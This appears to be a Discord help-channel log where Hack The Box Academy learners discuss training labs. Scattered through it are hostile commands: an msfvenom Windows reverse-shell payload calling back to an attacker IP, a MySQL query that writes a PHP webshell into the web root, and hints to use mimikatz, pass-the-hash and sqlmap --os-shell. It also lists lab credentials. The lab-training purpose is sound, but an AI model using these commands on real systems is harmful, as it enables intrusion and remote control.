yes I think you'll have to do hydra for the user kira first
thank you
np
please I think my DNS settings are messed up and I heard Resolv.conf is prioritized over hosts file and bcuz of this I can't do any labs with dns involved my kali version is 2023.3 this is what's in my resolv.conf
resolv.conf contains
Generated by NetworkManager
search localdomain
nameserver 1.1.1.1
What exactly is not working?
What do you mean by labs with DNS involved?
There is nothing unusual in your /etc/resolv.conf.
good morning, any help here please
I'm trying to solve attacking common services DNS
nslookup results
nslookup inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find inlanefreight.htb: NXDOMAIN
I altered the nameserver to 1.1.1.1 myself, there was some other IP address there before and that's what inlanefreight kept mapping to
inlanefreight htb isn't a public domain
you have to use the dns server provided in the section
i added it in my etc hosts
Read the Module: We can use this Splunk package to assist us.
are you still stuck my friend ?
Why?
You can use the IP from the specified resolver.
nslookup resolves the domain name from dns servers not from /etc/hosts
what I did is xxx.xxx inlanfreight.com in my etc hosts
why you use com?
TLD = htb, right?
sorry .htb
been using .htb, .com just came out of my fingers subconsciously
how do I "use the IP from the specified resolver"?
Then you only have to ask the specified NameServer (Target IP) for this domain. It knows this zone.
dig www.example.tld @10.10.10.10
don't think you need anything for that section
oh ok
i am working on Passwd, Shadow & Opasswd,but i can not find Will's credentials. who know where i can find Will's password
its from previous section
What exactly do you want to do with an entry in /etc/hosts?
The computer file hosts is an operating system file that maps hostnames to IP addresses. It is a plain text file. Originally a file named HOSTS.TXT was manually maintained and made available via file sharing by Stanford Research Institute for the ARPANET membership, containing the hostnames and address of hosts as contributed for inclusion by me...
i have tried the password i got previous section. but it is failure
thanks a lot friend 😊 appreciate it
then you got the wrong password
I thought the system won't recognize the .htb since it's not a "real" site so I'll have to put it in etc hosts to map it to the generated IP
The system would first look in the hosts file (/etc/hosts) and then ask the defined resolver (/etc/resolv.conf).
But if you already specify the resolver in your query, then the system will ask this resolver.
I think I should use the resolver method I find it hard knowing what to put after the @
i found a nameserver does the system resolve that if main domain IP is already in resolve.conf?
Resolver method?
No idea what you mean. You have to ask the authoritative server (Target IP) directly in any case. Only he knows the zone and can answer you.
Of course you can reconfigure your system. But then it will ask for this host for each name resolution.
But it is not a recursive resolver and therefore cannot resolve other names than inlanefreight.htb.
oh
https://academy.hackthebox.com/module/112/section/1068
hi guys. im stuck on smth really silly. im on this module and i cant seem to figure out how they get to root @ nfs
guess it's back to the drawing board for me🤡
You just need to understand how DNS works. It's really not difficult.
That's just an example for testing
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Every day I stress over unimportant things 😔 thank you 🙏🏼
Literally right above it "let us create such an entry for testing purposes"
Yh I assumed they wanted us to do that
And I couldn't figure it out
Hello, I need help on module Attacking Common Applications: Exploiting Web Vulnerabilities in Thick-Client Applications
I have followed the example but on the last part, after I modify the code to do sql injection, I can't Login. It seems like the Login button is not working or something. I also tried to use the cred from the example to Login but it doesn't work either, I don't know why. please help
https://academy.hackthebox.com/module/113/section/2164
This is what i modified on User.java
public User(int uid, String username, String password, String email, Role role) {
    this.uid = uid;
    this.username = username;
    this.password = password;
    this.email = email;
    this.role = role;
}
public void setPassword(String password) {
    this.password = password;
}

Check out the Video from Ippsec
https://www.youtube.com/watch?v=3bvKLj0akMM&t=360s
00:00 - Intro
02:10 - Using wget to recursively download files off an anonymous FTP Server
06:00 - Attempting to execute the Java Thick Client, then switching to Java version 8 and trying again
08:00 - Seeing the Thick Client makes some DNS Requests, make the DNS Request resolve and attempt to intercept with Burp
11:00 - BurpSuite failed us, us...
you can try changing the code to this https://0xdf.gitlab.io/2020/08/08/htb-fatty.html#admin-access
Fatty forced me way out of my comfort zone. The majority of the box was reversing and modifying a Java thick client. First I had to modify the client to get the client to connect. Then I’ll take advantage of a directory traversal vulnerability to get a copy of the server binary, which I can reverse as well. In that binary, first I’ll find a SQL ...
can someone tell me,why it doesnt ask for a password?i cant continue my fundamentals
i run this on my computer,in oracle
Anyone? 🥹
Someone help me? why i cant establish an SSH connection from VirtualBox with ubuntu? I can only through the site's workstation? Ubuntu doesnt ask for the password and i get stuck
htp-student typo?
it's suppose to be htp-student@10.129.30.211?
that a typo but you got a time out error so that isn't the issue
try scanning port 22 on that machine just confirm you can connect
also read #welcome and #rules after that use /verify at #bot-commands to send screenshot here
htb* still doesnt work.didnt know,ok i ll read
I just found this video:
Guy has same script as me, just different victim IP and different LHOST IP. Somehow it's working for him and not for me. So frustrating (I know it's a part of hacking, but damn...).
you should report it, not share it here, that's against academy TOS
I've reported it, they said they can't help me
Really frustrating since I just transcribed this guy script (changing the victims IP and msfvenom shellcode) and it's literally the same as mine...
Anyway I've edited that message
Sorry
support said that? i'm just a bit confused they should resolve that internally because the video is just against academy TOS, nothing to do with you
I mean about my error. They didn't even look the video or my exploit
can't help right now but i'll be back when i'm free and if you still need help with that i'll give you a ping
Thank you so much.
im finding password attacks one of the more frustrating modules, i’m not sure when htb wants me to use their wordlist or rockyou or something else entirely
This is exactly what you will encounter in reality. You don't know which password list is the right one.
Any good crypto player looking for a ctf team to join?
yeah, i suppose that’s fair
read #welcome and #rules after that use /verify at #bot-commands and ask that at #general
Am I the only one who has completed several modules and feels like I don't know anything? Is this normal?
were you taking notes?
Test your knowledge by trying a random skill assessment module
no
I was able to complete the hardest lab in the footprinting module without any help, but I still feel like I dont know anything, idk why
Try with other modules too
This rdp foot hold is ass, is there anything i can do to connect my machine to access the rdp network, this live engagement on shell and payloads
Hi. I'm having trouble configuring SELinux to deny access to a file. I have learned about compiling .te files, trying to make my custom labels, trying to reuse already used ones. Any help?
AD Enumeration & Attacks - Skills Assessment Part I - The webserver crashes trying to upload files such as chisel? Am i working in the right direction?
Are you in question 1 ? (Submit the contents of the flag.txt file on the administrator Desktop of the web server)
Im in the home stretch trying to get to the DC, i. used netsh to get this far
Not getting it clearly, so can you say which question are you trying
last question
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
trying to get chisel on the webserver so that i can run more tools to proceed
If that is the right way to go
Do post exploitation in svc_sql user using mimikatz and grab way to DC
They need to change this this rdp is so fking slow its making me going crazy wtf 🤬
just telling people exactly what to do in a skill assessment is pretty lame
Any hints? 👉👈
Python is rarely installed on Windows Systems. Try -f exe
Exploit is being used remotely, from my Linux PC
Oh wait, sorry. It just generates the payload as python format
Do you know if the target machine is little-endian or big-endian?
Little
That's the pack for
It enters on the JMP ESP also
Reach the padding and then the shellcode.
But I got no remote shell
# msfvenom -p 'windows/shell_reverse_tcp' LHOST=10.10.15.198 LPORT=1234 -f 'python' -b '\x00\0x0A\0x0D'
Here, why are the other bits 0x0A and 0x0D but the x00 is not 0x00?
No problem if it worked :D
Gonna check, but definitely it's gonna work
Hello! Can I be admin here and get paid?
absolutely not
head over to #welcome and verify your account
this channel is for module discussion only
AD Enumeration & Attacks - Skills Assessment Part I - I have the admin ntlm hash and just need to pivot to the machine, but pivot methods keep failing
any hints to use the correct pivot method to get the final flag on the DC desktop?
Thank you so much, definitely I gotta work on my attention and problem revision skills. I'm really grateful you helped me 🙏🏼🥹
It worked 😂
yes, dm 0xjb
if you really need to contact admins just tag the serious rule breaker role
^^
I have done my fair bit of basic BOFs and I know they can be a pain with shellcode involved. Nice job :)
also true
Yeah, now I got the connection on my local nc but can't interact and then it close the connection. This shit is hard AF 😂. Going to try it tomorrow in the HTB VM.
Pass the hash in impacket-psexec with mention user and DC IP using proxychains
what proxy method would you recommend trying on the webserver?
have you solved all previous questions ?
yes, only using netsh however, i haven't gotten a decent pivot going otherwise
i was able to use xfree to get to ms01 with that method
try tunneling in msfconsole, https://academy.hackthebox.com/module/158/section/1428.
Can I dm someone about Pivoting and Tunneling module
Rdp and Socks Tunneling with SocksOverRDp
I am unable to see if it is lab issue or skill issue
intro to Active Directory module, I am doing the lab and I cant connect to the windows server with RDP
Try to reset the target
hello y'all, anyone who have completed the Attacking common services lab easy, cuz I'm stuck, I found the password to the user and got access to the website but I'm struggling to upload a webshell (I guess this is the best way to grab the flag......)
although I guess the other way is thru sql but not sure
Any examples of this going through windows? in the middle rather than linux?
hey I'm doing the medium lab for "footprinting" and I'm on the RDP part trying to connect to the database but apparently I need to run the Server Management Studio as a privileged user? I'm a little lost
I managed to solve this.
Just keep trying doing the shellcode in msfvenom, it gives with the same arguments 3 different shellcodes (using encoders because of the bad chars).
Firstone get connection to netcat but no interactive shell.
Second one didn't even get a connection.
Third one get connection and shell.
Is this normal? Gotta always try several times same arguments on msfvenom? Or I'm missing something? I've literally press up and resend the same msfvenom command.
anyone willing to help with easy lab from attacking common services..!!!
Question, in the ATTACKING COMMON APPLICATIONS module for the Exploiting Web Vulnerabilities in Thick-Client Applications box, where do they get the IP address for this command from?
echo 10.10.10.174 server.fatty.htb >> C:\Windows\System32\drivers\etc\hosts
seems like you have the credentials of the user ||alex||
which you can use to get the credentials of the server administrator
Looks like the tun0 IPs from HTB VPN. I do not have that module so I might be wrong.
Okay thank you! I will try my pwnbox IP address again
Thanks for the tip. My real issue is every time I try to connect using the credentials "qtc:clarabibi" it says connection error.
No idea about that one m8
All good, thanks for responding.
anyone can give me a hint, with easy lab from attacking common services, I got access to mysql but can't find where to write the webshell, reading the forum I saw some comments regarding the possibility to write the webshell under C:\xampp\htdocs\backdoor.php, but can't login via RDP, I'm completely STUCK
C:\xampp\htdocs\ is the xampp webroot
ok.
Reread the attacking sql section it tells you how to do so
I read it but don't understand how to use SELECT ... INTO OUTFILE statement with LOAD_FILE() works...
I know mysql is running over Windows but can't find xampp\htdocs\ in the database unless I'm completely LOST
means I can write a command directly in the database without a path?
no
might need to take a step back and review how databases work cause you seem to have some odd misconceptions
just go through some mysql tutorials so you can understand the tech better
This MySQL basics section provides you with everything you need to know to manage data in MySQL effectively
ok., ty
id recommend setting up your own little mysql database so you can play around with it
Hello
I need help for Authority ! Where is the password for configuration password ? I search but I don't see
you could make your life easier and use sqlmap with --os-shell to get a shell
thatd defeat the point of the lesson
ty but i prefer to understand the things how works and do it manually
understanding the content and the lesson is more important than just answering the question correctly
agreed
i think you should think smarter not harder
yes and you can do that after you actually understand what youre doing
otherwise youll just get stuck as a skid forever
The point of the lesson is to learn how to do things in the event the --os-shell doesn't work
that too
And being able to actually control the commands rather than assume something works
Im like one of the biggest advocates of think smarter not harder in here, but the smarter thing is to learn what you're doing first
guys if someone can explain me why in Password attacks medium lab:
spoiler>>>>
|| I can connect from ssh as dennis and as root with same private key i really dont understand this concept i tried searching google but to no avail.||
Because Google won't really answer
||they both have the same key in their authorized keys list||
It's just shared/reused credentials
||aha so auth list holds all the keys i can get use to connect to a user ok got it Thanks man!||
||they both have the same public key in their authorized keys and have the same private keys||
ye i got it now thanks guys!
^
@thorn urchin can I DM?
busy at work
ok., no worries
ty btw
ok., @thorn urchin I understood your comment but now I got a different problem, the result of my webshell is not shown in the browser
I got this too, ty
Im doing password mutations, Im running into this error that I can't find online
ope and I cant post it
nevermind
thats just the end of the file
I did not think it was gonna get through 94k words in 10 sec
I'm stuck on this as well - it's the only part I'm missing from this module :P
I was afk but now I'm back at it again, I can't find any more users on the system
you can
there’s ||sa|| credentials you just have to look 😉
net user tells me we have
Administrator alex DefaultAccount
Guest WDAGUtilityAccount
I tried using the sa password for the admin user but that did not work for me
I reckon the @ delimits the end of the password, right?
||run ssms as admin|| then use the credentials you found
no
you’re welcome ^^
Im doing the mutations password challenge, and I have done the password file they provided with the custom rule file they provided, ran everything against the ftp server and got nothing, and to make sure, I used grep as well to look for "Pwn3d!"
do I have to change the default username to something other than "sam"?
Hi everybody
i'm doing Pivoting, Tunneling and Port forwards module . screenshot of the question i'm doing. I'm having issues with running this command python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 i get this error on the pivot host machine
nvm figured it out however the flag i'm submitting says it wrong smh
what could be wrong in this command SELECT "<?php system($_REQUEST[‘cmd’]) ?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php'; .....???
Hi guys!
Am I looking at the wrong thing?
might be missing ; in your syntax after the cmd )
The answer seems like System Logging Service
got it, ty
cool. your syntax is different than mine somewhat but the ;'s are important lol
can I DM?
ok
Does this seem like a module mistake?
Got it, its Notify
can i pm someone.. im stuck in Advanced File Disclosure of Web Attacks!
Why dont you just drop your question in here, so people can see if they can help with it.
Hello! Can I get a nudge on the Documentation and Reporting Practice Lab? I've been stuck for two days on question 1. I have so many different users and passwords but none of them get me on to the DC.
Are you on the first question then?
yeah. I'm having trouble getting Domain Admin.
What have your tried?
mix and matching a bunch of different creds
usernames: asmith, abuoldercon, admin, Administrator, solarwindsmonitor, sqldev, sqlprod, dhawkins, clusteragent
passwords: Welcome1, Welcome123!, Bacon1989, diamond1
Try to think about what those creds could be used for that is not going right to the DC, use those with some other tools to enumerate more users/services.
i'll keep trying. thank you so much dude
Hey guys, I'm in module "Using Web Proxies" :: "Skills Assessment - Using Web Proxies"
Question 3:
"Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload"
I don't get what am I suppose 2 send the intruder, the request?!
if so what am I suppose 2 mark as my target??
can someone please clarify me ??
@spring tundra
??
like the question said your target is the cookie, in intruder encode the cookie as the following question and hint the Payload Processing tab
I don't understand what should I send 2 the intruder ...
the cookie is in the response ...
dms
that dumb dumb ask to be admin yesterday but didn't get meme on enough so he's here for round 2 🤣
refresh the page and you will get the cookie in your request
good morning everyone, I've been stuck for days on the Attacking common services - Hard module, I'm literally going crazy I just can't get started, can anyone help me?
hint so some enum on the servers that are running on the target (@wooden wing if you didn't catch this)
Is okay I can just ban him 🤷♂️
that would be nice 🙏
thanx
I added ||prefix of the decode 31 characters next base 64 next ascii hex & grep-match the originally 88 characters cookie || .
but I get all response as 200 ...
what am I missing?
it's a cookie, doesn't matter what you send you will always get the same response code (for this part) look at the length
same ||1248||
all of them?
yes
and for the payload you use something like alphanum-case.txt right?
exactly this 1
can you send a screenshot of your intruder and one of the request
@vital adder dm
Module: NTLM Relay. I am stuck on the 3rd question of the skill assessment. Can anyone give me a hint?
what is that
I'm stuck on "Detecting Windows Attacks with Splunk", and the only question in module I can't answer is the Detecting Beaconing Malware section, " what is the most straightforward Splunk command to pinpoint beaconing". I've tried so many things that makes sense to me, but none of them are the answer. Any tips?
Ah got it - colleague found the source slides for the module :P
can anyone help in ICMP tunneling section of the Pivoting module I get this error on pivot host
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng) ./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)
when I try running this command : sudo ./ptunnel-ng -r10.129.82.159 -R22 to start the server
Alright, I give up. Attacking Common Services - Medium lab. Everyone is saying it’s super easy but I can’t find a user name anywhere. I found the obscure ||30021 port|| , did a deep dive into that port only and didn’t find a thing. Any help would be greatly appreciated. Really quite disappointed in myself on this one 😞
please how'd you solve dns lab in common services module?
Take a close look at the service running on this port and log in.
What is not working? What have you tried?
tried placing "nameserver IP" in resolv.conf, dig NS inlanefreight.htb only gives me ns.inlanefreight.htb i add it into subbrute resolv.conf, I've tried adding "IP Inlanefreight.htb" into etc.hosts etc... i've tried a lot of things actually
OMG! That is so nuts. I swear that I tried that loads before and it never showed me the ||anonymous login|| before 🤦‍♂️. Thanks so much - you rock 🔥
When I read this, I think that you really have to deal with the topic of DNS
you need to understand how DNS works in detail
how do I stop my resolv.conf from generating this IP?
nameserver 192.168.72.2
this configuration file does not generate any IP at all.
It only specifies which resolver your system should request
No, subbrute does not touch this config file.
You give subbrute a file with resolvers, which subbrute then uses.
is there any channel for hailstorm labs ?
As far as I know, the Business Labs do not have their own channel.
oh okay! Thanks @acoustic owl
Hi guys, I'm in broken authentication module. I have obtained valid user name and got the password by bruteforcing. I got the cookie too but I'm unable to decode it. URL -> Base64 then it gives the string, tried magic with code chef the text but no use.
Do I need to find the password for admin account too or support account is enough? I got the cookie decoded and encoded to but no use.
any hint for the Attacking Enterprise Networks module section External Information Gathering question 3 "What is the FQDN of the associated subdomain?" i have no idea which FQDN for which subdomain do i need
so I am like a new leaf here, but can anyone tell me why is hacking enjoyable? and how do you start it? I know i can find answers from google but i feel it would be better to hear it from a subject focused community
👍
may i ask how you started?
if you dont mind sharing some personal experience?
I was and am simply curious about what works or does not work
same
ahh i see
what type of challenges did you face at the beginning in this coding journey
with me coding has always been a dozzy type of feeling but the outcome was always enjoyable
Just do what you enjoy. Then learning is relatively easy
same
🫡
hello! I just finished the Password Attacks module but I'm still kinda confused on how Pass the Hash attacks actually work. I don't think the module explained that well enough, does anyone know any articles that go more in-depth?
Hey guys, I have a question. Can file upload vulnerability be exploited if the webserver renames .php file to .png? I mean, when i curl, it downloads file instead of executing code. Or does it mean that the webserver doesnt have needed configuration for executing php code?
How about using double extensions
If I do all of the modules in silver subscription and decide not to renovate the subscription next year I still own the modules right? I'll keep access to whatever modules I've started or completed, is that correct?
it takes the file and renames it before uploading to the server. I dont know how this can help. Or what do you mean?
All modules that you have completed you can keep
Is it only doing that to .php file or every extension?
cool thanks bunny what about the ones I have started but not completed up to 100% ?
To every extension
That's something need to research
You can't keep them and have to unlock them again if you want to have access to them.
Could someone help me on the third question for the crackmapexec skill assessment. I currently have the ||james|| credentials and own the SQL01 domain. What am I missing? I saw that maybe is related to ||a service account but I sprayed the credentials I own|| without any results.
Hi, stuck on SQLMap skill assessment final_flag. can I dm someone? 🙏
Hi everyone, if I am in the domain admin group which is in administrators group, why do I get access denied when trying to read an admin file? Do I have to do something with the ACL or just add my user to local admin group? I'm on the windows priv esc module btw.
I'm doing the password attacks module and bruteforcing ssh is taking forever with both crackmapexec and hydra, am I using the wrong tools? it's doing 1 attempt every few seconds
logout and login again
lol thanks!
been there, done that xD
I'm stuck on the Active Subdomain Enumeration and can't seem to figure out the Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer. question!??
I keep getting the ** server can't find inlanefreight.htb: NXDOMAIN
have you tried using ||dig|| ?
🔥
Yes, I've tried using it but still nothing
don’t forget to specify the dns server ||(@ip)|| in your query along with the domain
Apparently this cmd ||dig ns inlanefreight.htb @x.x.x.x|| worked for me!
yes 👍
hi I have determined that I need to use some NSE script on port 80 to get the flag
however, I have tried several scripts and have had no luck
including discovery script
this is for Nmap Scripting Engine section of Nmap module
what are you talking about
I have tried extensive scanning on port 80 and 31337 and 443. I haven't gotten very good results. I have tried several scripts
I'm a little bit stuck on the skill assessment for File inclusion, I have managed to get to the point where I can read a file and execute code but the response does not show in its entirety.
Can anyone assist me with this?
The burp response caps out at 110 lines
that’s because scripts won’t directly give you the flag lol
Ok so I should stay with port 80?
So ok so I really gotta look at output from scripts
31337
yes
Ok got it
After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? hello, i need hint on this because i spent hours on this, i connected to htb-student but i did not find the servicesid
this under windows defense and attacks
Hello, I'm working on HTB Academy-Login Brute Forcing-Skills Assessment-Website, been trying for over a week. Also, did something change, because I've read about a Harry Potter themed one that I never saw. If the answer relies on that, I haven't tried it. I've tried the ||Bill Gates|| themed approach using custom Usernames & Passwords. Can anyone point me in the right direction please?
In the module an event ID is called. Execute the attack and then filter the events according to it.
Got u
Hello everyone! Please someone explain to me. Why does it make sense to create new VPS with all the tools for each client? In HTB it's also advisable to have a new pwnbox for each assignment. Why is having one machine for all the operations not an option? If it's for the client's data (still not sure why), then does having multiple disposable VMs solve this issue as well?
Data security for clients
It also helps keep data clean if you don't have to parse which creds.list is for which client
I'm stuck on the Active Subdomain Enumeration and can't seem to figure out the Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. question!??
Hello all, for the KERBEROS ATTACKS module at AS-REPRoasting from Linux i can't solve the question. Most likely i am doing something wrong, but i can't RDP into the box, or even using directly impacket's GetNPUsers tool, still i am getting an error. Something with route not found, and i did add the commonname of the machine in etc/hosts.
Connected to the vpn?
@fathom pendant any thoughts on this??
Honestly you're probably overthinking it
@fathom pendant Once I added the name server to the etc/hosts, I ran the nslookup -type=any -query=AXFR TARGET (ns) and results finally came back. Is the serial number that it displays supposed to be the answer?
Yep, i am connected to the VPN, but lol, figured out what the issue was, the instance expired, so i had to regenerate a new one :)))
Is having multiple VMs in a local computer good for this reason as well?
id use more diff snapshots for that instead
but yes diff VMs for different purposes in general
Question#2: https://academy.hackthebox.com/module/143/section/1276#questionsDiv doesn't allow the answer ||Welcomxxxx|| and that's the only other user's hash
Oh I see it's the user from question 1's hash that you have to crack. That question needs to be reworded.
Is it just me, or should Attacking Common Services - Medium and Attacking Common Services - Easy be swapped? The medium lab is far easier imo...
nah med is fine. Easy and hard labs should be switched 
Doing hard rn, will confirm or reject 😆
Hey Im really new to this. Im trying to do the very first meow box but my ping cmd isnt working
are you connected with openvpn?
Yep
#starting-point , since you don't have access - read #welcome
I have a question on the final question of the Hacking WordPress skills assessment. Is anyone available to DM?
Disregard
Update. Finished the hard lab. Strong deny lmao
¯_(ツ)_/¯
I guess if you're familiar with the exploited toolset it'd be like muscle memory...
Has anyone done "Kerberos Attacks - Unconstrained Delegation - Computers - Q2: Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt"? I got the rc4 hash for DC01$ but when I try to read the directory with the flag, I keep getting errors. I used the printspool exploit to get the dc01 and then got the hash for that account through mimikatz. Then, I ran the hash through Rubeus again and tried to search the flag directory, but keep getting "Permission Denied"
im working through attacking enterprise networks - web enumeration and exploitation, at the end of the section for ir.inlanefreight.local it says: "From here, we could attempt to dump all data from the status database and record yet another finding, SQL Injection.". in a real engagement would you attempt to dump databases or is this a matter of being in scope or not?
i guess you would for creds
Nevermind, I just got it. One step the module doesn't show you...first use PowerView to identify a Domain Admin you want to target with the PrintSpool attack
Good morning! I would like to prepare for my local CTF competition in Mobile Security / Programming / Reverse Engineer / Forensic field, are there any relevant modules would you like to recommend?
Search for those topics in the module search bar
these things would be discussed with the client I imagine. If its proprietary or sensitive information, best to not dump it all and just provide a screen shot or something with redacted info to show you've found a way in.
thanks
Mobile: There are many modules about web. See if there are relevant topics about it.
Programming: Bash, Python and C#
Reverse Engineering: Malware Analysis and Game Hacking
Forensics: currently there are no modules on this.
```
PS C:\Users\htb-student> Get-ADUser -Filter "Name -eq 'Robert'"
PS C:\Users\htb-student> Get-ADUser -Filter "Name -eq 'Mtanaka'"
DistinguishedName : CN=MTanaka,CN=Users,DC=greenhorn,DC=corp
Enabled : True
GivenName : Mori
Name : MTanaka
ObjectClass : user
ObjectGUID : c19e402d-b002-4ca0-b5ac-59d416166b3a
SamAccountName : MTanaka
SID : S-1-5-21-1480833693-1324064541-2711030367-1603
Surname : Tanaka
UserPrincipalName :
```
how do i get Robert's surname ?
if he is not under DC:greenhorn or DC=corp
Try `Get-ADUser -Filter "GivenName -eq 'Robert'"`
it works...Thanks
Thank you so much! Right now my VIP membership for academy.htb is going to be expired this month, but I have not claimed included CPTS exam voucher yet ><
There is no VIP membership for the Academy.
In the Academy you can have the silver annual subscription, then you get an exam voucher and can do all modules up to Tier II.
Or you can buy cubes and unlock your modules with them.
You can buy the cubes cheaper with a subscription. Then you pay a monthly amount and get cubes so that you can unlock modules.
The Vip or Vip+ access is only available for the main platform.
Yes, i mean Silver Annual, sorry.😵‍💫
Anyway if there is any promotion or discount like I have seen in June, it would be great 🥰
Such actions are very rare. Maybe there will be such action when HTB publishes the new certificate for SOC Analyst.
working on the pivoting and tunneling section, the diagram states that the port 8080 in the Ubuntu server is configured to forward traffic to port 8000 in the attack host, so shouldnt the top left red arrow flow from right to left?
If you are a student and have a corresponding e-mail address, you can buy the student subscription. This is cheaper than anything else
Hey, payloadbunny, what is the route you recommend to complete the CPTS?
Oh, I am graduated student right now, so I can buy with student subscription. Thank you so much ❤️
Hi! In the Active Directory Enumeration & Attacks module, AD Enumeration & Attacks - Skills Assessment Part I section I am really lost in the question 6. I have the user and I am trying to use everything I know but I cannot find the credentials. Any hint of what tool should I use or the section where I should look deeper? Thanks
Always bake a ||Lazagne||
Or check out the tool ||CME||